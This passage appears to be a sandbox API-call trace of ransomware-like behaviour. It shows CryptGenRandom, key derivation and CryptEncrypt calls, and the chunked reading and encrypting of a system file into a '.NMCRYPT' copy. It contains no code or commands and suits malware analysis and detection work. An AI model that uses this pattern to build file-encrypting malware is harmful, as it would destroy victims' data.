out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.191] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.192] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.192] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0170.192] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0170.193] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0170.193] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.193] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad378) returned 1 [0170.193] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0170.193] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0170.193] wcslen (_String="\\\\?\\") returned 0x4 [0170.193] CryptDuplicateKey (in: hKey=0x9ad378, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad678) returned 1 [0170.193] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0170.194] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0170.194] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=18944) returned 1 [0170.194] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0170.194] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.196] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.197] GetLastError () returned 0x0 [0170.197] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.435] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.435] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.435] GetLastError () returned 0x0 [0170.435] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.435] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.435] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.435] GetLastError () returned 0x0 [0170.435] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.435] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.436] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.436] GetLastError () returned 0x0 [0170.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.436] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.436] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.436] GetLastError () returned 0x0 [0170.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.436] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.436] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.436] GetLastError () returned 0x0 [0170.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.436] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.436] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.436] GetLastError () returned 0x0 [0170.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.436] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.436] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.436] GetLastError () returned 0x0 [0170.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.437] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.437] GetLastError () returned 0x0 [0170.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.437] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.437] GetLastError () returned 0x0 [0170.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.437] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.437] GetLastError () returned 0x0 [0170.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.437] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.437] GetLastError () returned 0x0 [0170.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.437] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.437] GetLastError () returned 0x0 [0170.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.438] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.438] GetLastError () returned 0x0 [0170.438] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.438] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.438] GetLastError () returned 0x0 [0170.438] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.438] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.438] GetLastError () returned 0x0 [0170.438] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.438] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.438] GetLastError () returned 0x0 [0170.438] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.439] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.439] GetLastError () returned 0x0 [0170.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.439] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.439] GetLastError () returned 0x0 [0170.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.439] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.439] GetLastError () returned 0x0 [0170.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.439] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.439] GetLastError () returned 0x0 [0170.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.439] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.439] GetLastError () returned 0x0 [0170.439] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.439] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.440] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.440] GetLastError () returned 0x0 [0170.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.440] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.440] GetLastError () returned 0x0 [0170.440] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.440] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.440] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, 